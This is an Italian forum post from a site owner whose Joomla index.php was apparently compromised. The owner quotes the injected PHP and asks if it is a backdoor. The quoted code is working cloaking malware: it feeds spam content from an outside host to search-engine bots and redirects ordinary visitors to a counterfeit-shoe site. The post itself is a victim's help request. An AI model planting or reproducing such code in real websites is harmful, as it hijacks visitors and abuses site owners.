Back to top

Autore Topic: Malicious redirection nella pagina index.php  (Letto 641 volte)

Offline davix10

  • Esploratore
  • **
  • Post: 64
    • Mostra profilo
Malicious redirection nella pagina index.php
« il: 28 Giu 2016, 09:44:06 »
Salve a tutti, stamattina non riuscivo ad accedere al mio sito web perchè mi reindirizzava su una pagina web chiaramente fasulla. Inizialmente pensavo di aver preso un virus o di avere problemi sul mio browser ma dopo aver provato su più pc ho notato che il problema era comune e allora ho iniziato a controllare la pagina index.php visibile dal mio hosting e ho notato questo:


Codice: [Seleziona]
<?php

$parameter
=$_SERVER["QUERY_STRING"];
if(
$parameter!="")
{
  if(
isBot())
  {
      
$text="http://yilufa.info/soccer5/".$parameter;
      
$text=file_get_contents($text);
      
$text=str_replace("http://yilufa.info/soccer5/","?",$text);
      echo 
$text;
  }
  else
  {
      
header("Location: http://nikesoccercleatsoutlet.com");
  }
  exit;
}


function 
isBot() 

    
$is_bot false;
    
        
$agent "botstr:".strtolower($_SERVER['HTTP_USER_AGENT']); 
        
$bot_array = array('googlebot','msnbot''mediapartners-google','yahoo','vbseo','bingbot','sohu-search');
        foreach(
$bot_array as $bot)
        {  
            if(
strpos($agent,$bot)>0)
            { 
                
$is_bot true
                break;
            }
        }
    
    return 
$is_bot
}
?>







Vi è mai capitato? Cancellandolo sembra tornato a posto ma... potrebbe esserci una backdoor?




Versione joomla: 3.5.1
Hosting: Register
Versione mySql: 5.1.63-enterprise-commercial-advanced-log

Grazie!
« Ultima modifica: 28 Giu 2016, 09:45:39 da davix10 »

 



Web Design Bolzano Kreatif